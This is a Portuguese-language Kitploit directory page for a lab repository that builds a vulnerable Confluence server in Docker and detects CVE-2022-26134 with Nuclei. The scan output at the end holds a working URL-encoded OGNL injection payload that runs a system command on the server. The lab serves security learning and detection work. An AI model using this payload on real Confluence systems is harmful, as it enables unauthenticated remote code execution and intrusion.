Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-26134-LAB — Detecção de CVE-2022-26134 usando Nuclei | Kitploit
Ferramentas/GitHubGitHub/skhalsa-sigsci/cve-2022-26134-lab
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubskhalsa-sigsci/cve-2022-26134-lab

CVE-2022-26134-LAB

Detecção de CVE-2022-26134 usando Nuclei

Ver Repositório
31há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-26134-LAB

O Confluence Server e o Confluence Data Center incluem uma vulnerabilidade significativa de execução remota de código não autenticada identificada como CVE-2022-26134, de acordo com um aviso de segurança divulgado pela Atlassian em 2 de junho de 2022. A vulnerabilidade não estava corrigida quando foi publicada em 2 de junho e estava sendo explorada ativamente. A partir de 3 de junho, tanto correções quanto uma solução temporária estão disponíveis.

Este repositório destina-se apenas a fins experimentais e educacionais.

Dependências

  • Docker
  • Nuclei

Ambiente Confluence Vulnerável

Executando o ambiente vulnerável

root@kitploit:~
docker-compose up

Após a inicialização, você pode acessar o servidor Confluence usando o seguinte endereço URL:

http://127.0.0.1:8090/

Configuração do Confluence Server

  1. Na primeira vez que visitar o site, você passará pelo processo de configuração.
  2. Não marque nenhuma caixa e selecione "Next" na página "Get apps".
  3. Na página da chave de licença, clique no link que diz "Get an evaluation license".
  4. Você será redirecionado para my.atlassian.com. Certifique-se de que o tipo de licença selecionado seja Confluence (Data Center). Digite qualquer nome de organização que desejar. Certifique-se de que o botão de opção "Your instance is" esteja selecionado como "up and running". Depois de verificar esses detalhes, clique no botão "Generate License".
  5. Uma janela de confirmação aparecerá perguntando se você deseja instalá-lo no servidor: 127.0.0.1. Selecione "Yes".
  6. Selecionar "Yes" preencherá automaticamente a chave de licença na sua instância local do Confluence. Selecione "Next".
  7. Escolha o tipo de implantação "Standalone" e selecione "Next".
  8. Na página de configuração do banco de dados, os detalhes devem ser preenchidos da seguinte forma:
    • Tipo de banco de dados: PostgreSQL
    • Tipo de configuração: Simple
    • Hostname: db
    • Porta: 5432
    • Nome do banco de dados: confluence
    • Nome de usuário: confluence
    • Senha: 123456789
  9. Depois de preencher esses campos, pressione o botão "Test connection". Você deve receber a mensagem "Success! Database connected successfully". Em seguida, clique em "Next".
  10. Ele começará a configurar seu banco de dados. Isso pode levar um pouco de tempo. Aguente firme.
  11. Quando a configuração do banco de dados for concluída, você estará na página "Load Content". Selecione o botão "Example Site".
  12. Em seguida, na página "Configure User Management", selecione "Manage users and groups with Confluence".
  13. Em seguida, na página "Configure System Administrator Account", crie uma conta e selecione "Next".
  14. Quando concluído, você verá que a configuração foi bem-sucedida. Pressione "Start".
  15. Ele pedirá que você "Create a space to store your work". Insira qualquer nome de espaço que desejar.
  16. Pule o tutorial.
  17. Você concluiu agora a configuração de avaliação do Confluence Server.

Detectando CVE-2022-26134

A vulnerabilidade é uma vulnerabilidade de injeção OGNL que afeta o servidor HTTP. A carga útil (payload) OGNL é colocada na URI de uma solicitação HTTP. Qualquer tipo de método HTTP parece funcionar, seja válido (GET, POST, PUT, etc.) ou inválido (por exemplo, "BALH").

https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

Usando Nuclei

Execute o seguinte comando Nuclei:

root@kitploit:~
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml

Saída da varredura

root@kitploit:~
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
Baixar ferramenta